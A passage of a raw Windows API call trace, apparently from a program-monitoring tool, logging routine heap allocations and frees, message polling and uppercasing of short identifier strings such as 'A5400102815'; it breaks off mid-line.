[0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.902] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.902] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.902] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.903] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.903] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.903] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.903] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.903] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.904] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.904] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.904] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.904] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.904] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.905] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.905] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.905] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.905] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.906] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.906] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.906] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.907] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.907] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.907] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.907] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.907] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0160.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.908] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.908] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.908] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.908] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0160.908] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34bfec8 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.912] HeapFree (in: 